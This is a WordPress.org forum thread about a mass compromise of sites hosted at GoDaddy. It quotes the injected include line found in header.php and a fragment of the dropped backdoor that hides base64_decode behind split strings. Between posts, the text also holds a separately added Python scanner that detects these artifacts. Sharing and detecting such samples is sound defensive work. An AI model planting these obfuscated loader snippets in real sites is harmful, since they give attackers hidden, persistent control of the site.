WordPress.org


header.php file getting hacked (11 posts)

  1. shawn00m
    Member
    Posted 11 months ago #

    I'm experiencing a hacking problem with most of my WordPress installations. There are two things that are happening. First, a new PHP file is uploaded to the wp-includes folder. What this file does, I do not know. I don't understand PHP well enough. I would be happy to share it if it would help.

    The second thing is a piece of code that is inserted after the opening body tag in the header.php file. Here is a sample of this code:
    <?php /* start_extra_placement_ */ @include_once("/home/content/54/9357554/html/wp-includes/Oyk5.php"); /* end_extra_placement_ */ ?>

    This problem is across multiple hosting accounts, although they are all hosted at GoDaddy. If anyone has any insights as to how these hackers are getting in and how I can prevent them from coming back, I would love to know. Thank you.

  2. Pioneer Valley Web Design
    Member
    Posted 11 months ago #

    It may prove beneficial to the community to use pastebin.com to share that file by linking to it here and also use Sucuri to scan your site and share any results also.

  3. shawn00m
    Member
    Posted 11 months ago #

    Thank you for your reply. Here is a link to the file at pastebin:
    [Moderator Note: Removed link to code used to exploit site]

  4. Pioneer Valley Web Design
    Member
    Posted 11 months ago #

    Please rebuild site:

    function current($token)
    {
        $func = 'ba' . 'se' . '6' . '4' . '_' . 'de' . 'co' . 'de';
        return unserialize($func($token));
    }

    Is malicious base64 eval code.

  5. The Hack Repair Guy
    Member
    Posted 11 months ago #

    Your site has been compromised.

    Start by changing all passwords (FTP/GoDaddy/admins).

    Then update WordPress, plugins and themes.

  6. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

  7. shawn00m
    Member
    Posted 11 months ago #

    Seacoast Web Design, I'm not understanding your comment.

    To others, I know my site was hacked. 13 of my sites were hacked on the same day at the same time over various hosting accounts. This isn't one site with one PW.

    My questions:

    Has anyone ever experienced something similar?
    Any suggestions on how all of the sites were hit simultaneously?
    Any advice to prevent it from happening again?

    Thank you.

  8. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

    Has anyone ever experienced something similar?

    We see hacked sites every day here, unfortunately. :-(

    Any suggestions on how all of the sites were hit simultaneously?

    Were they all on the same server or with the same hosts? Many hosts experienced problems due to mass attacks recently. Your hosts may have been one of them.

    Any advice to prevent it from happening again?

    Review Hardening WordPress as suggested above.

  9. shawn00m
    Member
    Posted 11 months ago #

    Thanks esmi. There were a total of 13 sites hacked on 5 different hosting accounts - all of them at GoDaddy - all at 5:17pm on May 18.

    A colleague of mine had the same issue the next day with 11 of his WP sites on 4 different hosting accounts - again all at GoDaddy.

    The big difference between his attacks and mine is that his hack included the installation of content and links related to ED medication. This caused one of his sites to get flagged by Google. None of mine experienced that, but the method was otherwise almost identical.

    While I'm trying to get help to prevent this, I also am trying to alert people to look at their sites for a similar attack. I wouldn't have known I was hacked if my colleague didn't tell me about his hacks. After seeing his sites, I checked my own and found the offending code.
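Added example, not part of any post in this thread: a small Python scanner for checking a site for the two artifacts quoted above, the `start_extra_placement_` include in header.php and a function name assembled from string fragments as in the dropped file. The function names and the `HIDDEN_NAMES` list are assumptions made for this sketch, and the sample strings are constructed from the snippets in posts 1 and 4.

```python
import re
from pathlib import Path

# Marker comment followed by an include, as in the header.php sample in post 1.
INJECTED = re.compile(
    r"/\*\s*start_extra_placement_\s*\*/\s*@?\s*(?:include|require)(?:_once)?"
    r"\s*\(\s*[\"']([^\"']+)[\"']\s*\)", re.I)
# A run of quoted string literals joined with PHP's "." operator.
LITERAL = r"(?:'[^']*'|\"[^\"]*\")"
CONCAT = re.compile(LITERAL + r"(?:\s*\.\s*" + LITERAL + r")+")
# Function names worth flagging when built from fragments (assumed list).
HIDDEN_NAMES = {"base64_decode", "gzinflate", "str_rot13", "eval", "assert"}


def scan_text(php):
    """Return (kind, detail) findings for one PHP source string."""
    findings = [("injected_include", m.group(1)) for m in INJECTED.finditer(php)]
    for m in CONCAT.finditer(php):
        joined = "".join(a or b for a, b in re.findall(r"'([^']*)'|\"([^\"]*)\"", m.group(0)))
        if joined.lower() in HIDDEN_NAMES:
            findings.append(("split_function_name", joined))
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for hits only."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_text(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


# Constructed samples: the two snippets quoted in the thread.
SAMPLE_HEADER = '''<body>
<?php /* start_extra_placement_ */ @include_once("/home/content/54/9357554/html/wp-includes/Oyk5.php"); /* end_extra_placement_ */ ?>
<?php wp_head(); ?>'''
SAMPLE_DROPPED = """function current($token)
{
    $func = 'ba' . 'se' . '6' . '4' . '_' . 'de' . 'co' . 'de';
    return unserialize($func($token));
}"""

if __name__ == "__main__":
    import sys
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, found)
```

Run it against a copy of the site's document root; every path reported under `injected_include` is a dropped file to inspect alongside the theme file that includes it.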

  10. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

    all of them at GoDaddy - all at 5:17pm on May 18

    GoDaddy were definitely one of the hosts hit by the mass attacks. I assume you meant April 18 - not May 18, yes? If not, I'd like a ride in your time machine. ;-)

  11. shawn00m
    Member
    Posted 11 months ago #

    esmi, yes, it was April 18, not May 18. I wish I had a time machine to go back and catch the bums that did this. Thanks for your info. The Hardening WordPress info is helpful.

    I also found a plugin called Better WP Security. It does many of the things suggested on that page. Are you - or anyone reading this - familiar with it?
